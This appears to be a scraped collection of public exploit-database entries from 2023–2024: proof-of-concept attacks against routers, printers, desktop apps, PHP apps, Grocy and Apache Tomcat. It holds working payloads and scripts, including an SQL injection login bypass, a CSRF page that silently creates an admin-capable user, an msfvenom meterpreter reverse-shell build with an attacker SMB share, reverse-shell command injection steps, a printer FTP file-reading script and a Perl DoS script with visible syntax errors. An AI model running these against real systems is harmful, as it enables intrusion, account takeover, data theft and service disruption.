<pre><code># Exploit Title: TP-LINK TL-WR740N - Multiple HTML Injection Vulnerabilities<br /># Date: 25/9/2023<br /># Exploit Author: Shujaat Amin (ZEROXINN)<br /># Vendor Homepage: http://www.tp-link.com <br /># Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n<br /># Tested on: Windows 10<br /><br />---------------------------POC-----------------------------<br /><br />1) Go to your routers IP (192.168.0.1)<br /><br />2) Go to Access control --> Target,rule<br /><br />3) Click on add new <br /><br />5) Type <h1>Hello<h1> in Target Description box<br /><br />6) Click on Save, and now you can see html injection on the webpage<br /><br /></code></pre>
<pre><code># Exploit Title: GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities<br /># Date: 25/9/2023<br /># Exploit Author: Syed Affan Ahmed (ZEROXINN)<br /># Vendor Homepage: https://www.embedthis.com/goahead/<br /># Affected Version: 2.5 may be others.<br /># Tested On Version: 2.5 in ZTE AC3630<br /><br />---------------------------POC---------------------------<br /><br />GoAhead Web Server Version 2.5 is prone to Multiple HTML-injection vulnerabilities due to inadequate input validation.<br /><br />HTML Injection can cause the ability to execute within the context of that site.<br /><br />http://192.168.0.1/goform/formTest?name=<h1>Hello</h1>&address=<h1>World</h1><br /><br /></code></pre>
<pre><code>#!/usr/bin/perl<br /># ComSndFTP Server Remote Format String Denial of Service (DoS)<br /><br />use strict;<br />use warnings;<br />use IO::Socket;<br /><br />$| = 1;<br /><br />my $host = "192.168.172.136";<br />my $port = "21"";<br /><br />my $payload = '%s%p%x%d';<br /><br />print "Connecting... ";<br /><br />my $sock = IO::Socket::INET->new(<br /> PeerAddr => $host,<br /> PeerPort => $port,<br /> Proto => 'tcp',<br /> Timeout => 30<br />);<br /><br />die "Unable to connect \n";<br /><br />$sock->recv(my $content, 100, 0);<br />sleep(2);<br /><br />$sock->send("USER $payload\r\n", 0);<br />sleep(2);<br /><br />$sock->recv($content, 100, 0);<br />sleep(5);<br /><br />$sock->close;<br /><br />print "Denial Of Service completed!\n";<br />exit(0);<br /></code></pre>
<pre><code>#Exploit Title: Ricoh Printer Directory and File Exposure <br />#Date: 9/15/2023<br />#Exploit Author: Thomas Heverin (Heverin Hacker)<br />#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers<br />#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py<br />#Version: Ricoh Printers - All Versions<br />#Tested on: Windows<br />#CVE: N/A <br /><br />#Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)<br /><br />from ftplib import FTP<br /><br />def ftp_connect(ip):<br /> try:<br /> ftp = FTP(ip)<br /> ftp.login("guest", "guest")<br /> print(f"Connected to {ip} over FTP as 'guest'")<br /> return ftp<br /> except Exception as e:<br /> print(f"Failed to connect to {ip} over FTP: {e}")<br /> return None<br /><br />if __name__ == "__main__":<br /> target_ip = input("Enter the Ricoh Printer IP address: ")<br /> <br /> ftp_connection = ftp_connect(target_ip)<br /> if ftp_connection:<br /> try:<br /> while True:<br /> file_list = ftp_connection.nlst()<br /> print("List of Ricoh printer files and directories:")<br /> for index, item in enumerate(file_list, start=1):<br /> print(f"{index}. {item}")<br /> <br /> file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1<br /> if file_index < 0:<br /> break<br /> <br /> if 0 <= file_index < len(file_list):<br /> selected_file = file_list[file_index]<br /> lines = []<br /> ftp_connection.retrlines("RETR " + selected_file, lines.append)<br /> print(f"Contents of '{selected_file}':")<br /> for line in lines:<br /> print(line)<br /> else:<br /> print("Invalid file index.")<br /> except Exception as e:<br /> print(f"Failed to perform operation: {e}")<br /> finally:<br /> ftp_connection.quit()<br /> <br /><br /><br /></code></pre>
<pre><code># Exploit Title: Typora v1.7.4 - OS Command Injection<br /># Discovered by: Ahmet Ümit BAYRAM<br /># Discovered Date: 13.09.2023<br /># Vendor Homepage: http://www.typora.io<br /># Software Link: https://download.typora.io/windows/typora-setup-ia32.exe<br /># Tested Version: v1.7.4 (latest)<br /># Tested on: Windows 2019 Server 64bit<br /><br /># # # Steps to Reproduce # # #<br /><br /># Open the application<br /># Click on Preferences from the File menu<br /># Select PDF from the Export tab<br /># Check the “run command” at the bottom right and enter your reverse shell<br />command into the opened box<br /># Close the page and go back to the File menu<br /># Then select PDF from the Export tab and click Save<br /># Reverse shell is ready!<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Bank Locker Management System - SQL Injection<br /># Application: Bank Locker Management System<br /># Date: 12.09.2023<br /># Bugs: SQL Injection <br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://phpgurukul.com/<br /># Software Link: https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/<br /># Tested on: Windows 10 64 bit Wampserver <br /><br />## Description:<br />This report highlights a critical SQL Injection vulnerability discovered in the "Bank Locker Management System" application. The vulnerability allows an attacker to bypass authentication and gain unauthorized access to the application.<br /><br />## Vulnerability Details:<br />- **Application Name**: Bank Locker Management System<br />- **Software Link**: [Download Link](https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/)<br />- **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/)<br /><br />## Vulnerability Description:<br />The SQL Injection vulnerability is present in the login mechanism of the application. By providing the following payload in the login and password fields:<br /><br />Payload: admin' or '1'='1-- -<br /><br />An attacker can gain unauthorized access to the application with administrative privileges.<br /><br />## Proof of Concept (PoC):<br />1. Visit the application locally at http://blms.local (assuming it's hosted on localhost).<br />2. Navigate to the "banker" directory: http://blms.local/banker/<br />3. In the login and password fields, input the following payload:<br />4. admin' or '1'='1-- -<br /><br /></code></pre>
<pre><code># Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability<br /># Application: Grocy<br /># Version: <= 4.0.2<br /># Date: 09/21/2023<br /># Exploit Author: Chance Proctor<br /># Vendor Homepage: https://grocy.info/<br /># Software Link: https://github.com/grocy/grocy<br /># Tested on: Linux<br /># CVE : CVE-2023-42270<br /><br /><br /><br />Overview<br />==================================================<br />When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.<br />This makes it easy to adjust your request since it is a known format. <br />There is also no CSRF Token or other methods of verification in place to verify where the request is coming from.<br />This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.<br /><br /><br /><br />Proof of Concept<br />==================================================<br />Host the following html code via a XSS or delivery via a phishing campaign:<br /><br /> <html><br /> <form action="/api/users" method="post" enctype="application/x-www-form-urlencoded"><br /> <input name='username' value='hacker' type='hidden'><br /> <input name='password' value='test' type='hidden'><br /> <input type=submit><br /> </form><br /> <script><br /> history.pushState('','', '/');<br /> document.forms[0].submit();<br /> </script><br /> </html><br /><br /><br />If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials<br /><br /> Username: hacker<br /> Password: test<br /><br />Note:<br />In order for this to work, the target must have Create User Permissions.<br />This is enabled by default.<br /><br /><br /><br />Proof of Exploit/Reproduce<br />==================================================<br />http://xploit.sh/posts/cve-2023-42270/<br /><br /></code></pre>
<pre><code># Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution<br /># Date: 9/27/2023<br /># Exploit Author: ItsSixtyN3in<br /># Vendor Homepage: https://webcatalog.io/en/<br /># Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe<br /># Version: 48.4.0<br /># Tested on: Windows<br /># CVE : CVE-2023-42222<br /><br />Vulnerability summary:<br />WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery.<br /><br />Exploit details:<br /><br />- Create a reverse shell file.<br /><br />msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe<br /><br /><br /><br />- Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py)<br /><br />python3 smbserver.py Tools -smb2support<br /><br /><br /><br />- Have the user sync a page with the payload as a renamed link<br /><br />[Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title)<br /><br /><br /><br />Payload:<br />search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title<br /><br />Tobias Diehl<br />Security Consultant<br />OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300<br />Pronouns: he/him<br />e-mail: tobias.diehl@bulletproofsi.com<br /><br /></code></pre>
<pre><code># Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection<br /># Discovered by: Ahmet Ümit BAYRAM<br /># Discovered Date: 12.09.2023<br /># Vendor Homepage: http://www.7stickynotes.com<br /># Software Link:<br />http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe<br /># Tested Version: 1.9 (latest)<br /># Tested on: Windows 2019 Server 64bit<br /><br /># # # Steps to Reproduce # # #<br /><br /># Open the program.<br /># Click on "New Note".<br /># Navigate to the "Alarms" tab.<br /># Click on either of the two buttons.<br /># From the "For" field, select "1" and "seconds" (to obtain the shell<br />within 1 second).<br /># From the "Action" dropdown, select "command".<br /># In the activated box, enter the reverse shell command and click the "Set"<br />button to set the alarm.<br /># Finally, click on the checkmark to save the alarm.<br /># Reverse shell obtained!<br /><br /></code></pre>
<pre><code># Exploit Title: CVE-2024-21733 Apache Tomcat HTTP Request Smuggling<br /># Date: 1/31/2024<br /># Exploit Author: xer0dayz<br /># Vendor Homepage: https://tomcat.apache.org/<br /># Software Link: https://tomcat.apache.org/<br /># Version: 8.5.7 to 8.5.63 or 9.0.44 or later<br /># CVE : CVE-2024-21733<br /><br />## Description:<br />Apache Tomcat from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43 are vulnerable to client-side de-sync attacks.<br /><br />Client-side de-sync (CSD) vulnerabilities occur when a web server fails to correctly process the Content-Length of POST requests. By exploiting this behavior, an attacker can force a victim's browser to de-synchronize its connection with the website, causing sensitive data to be smuggled from the server and/or client connections.<br /><br />## Remediation:<br />Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.<br /><br />## Credit:<br />This vulnerability was reported responsibly to the Tomcat security team by xer0dayz from Sn1perSecurity LLC.<br /><br />## History:<br />2024-01-19 Original advisory<br /><br />## Full Security Advisory: https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz<br /><br />## Full Write-Up: https://sn1persecurity.com/wordpress/cve-2024-21733-apache-tomcat-http-request-smuggling/<br /><br />## PoC/Exploit:<br /><br />POST / HTTP/1.1<br />Host: hostname<br />Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Priority: u=0, i<br />Connection: keep-alive<br />Content-Length: 6<br />Content-Type: application/x-www-form-urlencoded<br />X<br /><br />Sent with [Proton Mail](https://proton.me/) secure email.<br /></code></pre>
